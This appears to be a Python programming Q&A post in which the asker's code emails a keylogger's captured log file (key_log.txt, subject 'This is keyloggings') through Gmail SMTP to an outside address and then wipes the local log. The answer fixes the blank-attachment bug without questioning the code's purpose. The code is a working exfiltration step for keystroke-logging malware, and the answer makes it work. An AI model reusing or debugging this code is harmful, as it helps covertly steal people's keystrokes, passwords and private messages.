# receiving email attachment as a blank file

Tags: python, python-2.7

This is the code which i have written...

this sends me a blank `.txt` file as an attachment though it contains data in it...

```
 email_user = 'user@gmail.com'
 email_password = '********'
 email_send = 'send@gmail.com'

 subject = 'This is keyloggings '

 msg = MIMEMultipart()
 msg['From'] = email_user
 msg['To'] = email_send
 msg['Subject'] = subject

 body = 'This is keyloggings'
 msg.attach(MIMEText(body,'plain'))

 filename = 'key_log.txt'
 attachment  = open(filename,'rb')

 part = MIMEBase('application','octet-stream')
 part.set_payload((attachment).read())
 encoders.encode_base64(part)
 part.add_header('Content-Disposition',"attachment;filename= %s" %filename)

 msg.attach(part)

 server = smtplib.SMTP('smtp.gmail.com',587)
 server.ehlo()
 server.starttls()
 server.ehlo()
 server.login(email_user,email_password)
 text = msg.as_string()
 server.sendmail(email_user,email_send,text)
 server.quit()

 #the below code overwrites the file after sending email
 open('C:/Users/sutha/OneDrive/Desktop/keylogger.txt','w').close()
```

Comment: can you accept the answer if it solved your problem?

Answer (score 0):

You need to `close` the file after you have `read` it.

After `part.set_payload((attachment).read())` add,

```
# Close opened file
attachment.close()
```

While you are on it, change `part.set_payload((attachment).read())` to `part.set_payload(attachment.read())` you don't need to enclose variable in round brackets.

Adding on, a better way to do it is using `with` which close the file itself,

```
with open(filename,'rb') as attachment:
    part.set_payload(attachment.read())
```